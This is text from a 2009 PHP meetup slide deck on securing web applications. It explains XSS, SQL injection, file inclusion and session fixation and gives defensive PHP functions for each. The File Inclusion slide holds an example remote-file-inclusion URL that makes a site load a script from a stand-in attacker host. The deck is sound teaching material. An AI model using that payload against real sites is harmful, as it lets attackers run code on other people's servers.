Security in PHP Applications By: Aditya Mooley Nagpur PHP Meetup August'09

Who Am I? Aditya Mooley ( [email_address] ) Zend Certified PHP 5 Engineer Working with SANIsoft Technologies since last 6 years Opensource contributor Writing secure web applications

Aditya Mooley ( [email_address] )

Zend Certified PHP 5 Engineer

Working with SANIsoft Technologies since last 6 years

Opensource contributor

Writing secure web applications

We will discuss ... Why Secure What to Secure How to Secure

Why Secure

What to Secure

How to Secure

Why secure? PHP is widely used programming language for web Used by individuals as well as corporates Handles lot of critical and sensitive information Malicious users can misuse this information if they get access to it

PHP is widely used programming language for web

Used by individuals as well as corporates

Handles lot of critical and sensitive information

Malicious users can misuse this information if they get access to it

Secure what? Secure code Secure database Secure web server

Secure code

Secure database

Secure web server

How to secure Follow some basic guidelines register_globals is biggest evil. It must be off. Don't use $_REQUEST. Use individual super globals instead. Follow Thumb Rule - Filter input Escape output

Follow some basic guidelines

register_globals is biggest evil. It must be off.

Don't use $_REQUEST. Use individual super globals instead.

Follow Thumb Rule -

Filter input

Escape output

Security Issues Input validation Cross site scripting SQL Injection File inclusion Session fixation and lot more ...

Input validation

Cross site scripting

SQL Injection

File inclusion

Session fixation

and lot more ...

Input Validation Don't trust your users Check every data coming from user Use built-in PHP functions like - is_int, is_string, is_bool, etc. ctype_* category of functions Whitelist over blacklist Check data for what is allowed instead of what is not allowed

Don't trust your users

Check every data coming from user

Use built-in PHP functions like -

is_int, is_string, is_bool, etc.

ctype_* category of functions

Whitelist over blacklist

Check data for what is allowed instead of what is not allowed

Cross site scripting (XSS) XSS is a situation where an attacker can inject a nicely crafted HTML string which when executed on client browser can cause unexpected results. This may lead to - Session take over. Setting malicious cookies Access to restricted area

XSS is a situation where an attacker can inject a nicely crafted HTML string which when executed on client browser can cause unexpected results.

This may lead to -

Session take over.

Setting malicious cookies

Access to restricted area

XSS ... Let's see an example XSS can be prevented by escaping the data with – htmlentities() or htmlspecialchars() Filtering out the HTML tags with strip_tags()

Let's see an example

XSS can be prevented by

escaping the data with – htmlentities() or htmlspecialchars()

Filtering out the HTML tags with strip_tags()

SQL Injection Code injection technique to exploit the vulnerability in SQL statements in code. Can lead to - Removal of data Access to critical information like passwords Can cause due to - Incorrect filtering of escape characters Incorrect type handling

Code injection technique to exploit the vulnerability in SQL statements in code.

Can lead to -

Removal of data

Access to critical information like passwords

Can cause due to -

Incorrect filtering of escape characters

Incorrect type handling

SQL Injection ... Example1 , Example2 SQL injection can be prevented by - mysql_real_escape_string() and similar functions Typecasting data properly before passing to SQL Using Prepared Statements (MySQLi/PDO)

Example1 , Example2

SQL injection can be prevented by -

mysql_real_escape_string() and similar functions

Typecasting data properly before passing to SQL

Using Prepared Statements (MySQLi/PDO)

File Inclusion A technique by which an attacker can include a file from remote location or from same server which is not intended for general users Attacker can get shell access to the server which can be used to any extent. Such attacks can be prevented by properly filtering the input data before using it in include statement.

A technique by which an attacker can include a file from remote location or from same server which is not intended for general users

Attacker can get shell access to the server which can be used to any extent.

Such attacks can be prevented by properly filtering the input data before using it in include statement.

File Inclusion ... Remote File Inclusion http://mysite.com/index.php?page=http://hacker.com/hacker.php Local File Inclusion Attacker can send a relative path which can include a secret file on webserver even out of webroot. Example .

Remote File Inclusion

http://mysite.com/index.php?page=http://hacker.com/hacker.php

Local File Inclusion

Attacker can send a relative path which can include a secret file on webserver even out of webroot.

Example .

Session Fixation Through this technique, attacker can get access to the valid session of a user. After this, there is no way for the website to differentiate between the two. Attacker can perform all the actions that are allowed to the original user. Example .

Through this technique, attacker can get access to the valid session of a user.

After this, there is no way for the website to differentiate between the two.

Attacker can perform all the actions that are allowed to the original user.

Example .

Session Fixation ... Session hijacking can be prevented by generating a new session id everytime a user logs in. This can be done with session_regenerate_id() For extra security disable the ini setting session.use_trans_sid

Session hijacking can be prevented by generating a new session id everytime a user logs in.

This can be done with session_regenerate_id()

For extra security disable the ini setting session.use_trans_sid

Much more Web applications can be exploited by numerous other ways. Refer - http://www.phpwact.org/security/risk/catalog http://www.phpwact.org/security/attack/catalog

Web applications can be exploited by numerous other ways.

Refer -

http://www.phpwact.org/security/risk/catalog

http://www.phpwact.org/security/attack/catalog

References http://www.php.net http://en.wikipedia.org http://www.phpwact.org

http://www.php.net

http://en.wikipedia.org

http://www.phpwact.org

Examples used in this presention can be downloaded from http://www.sanisoft.com/blog/wp-content/uploads/2009/08/security.tar.gz

Thanks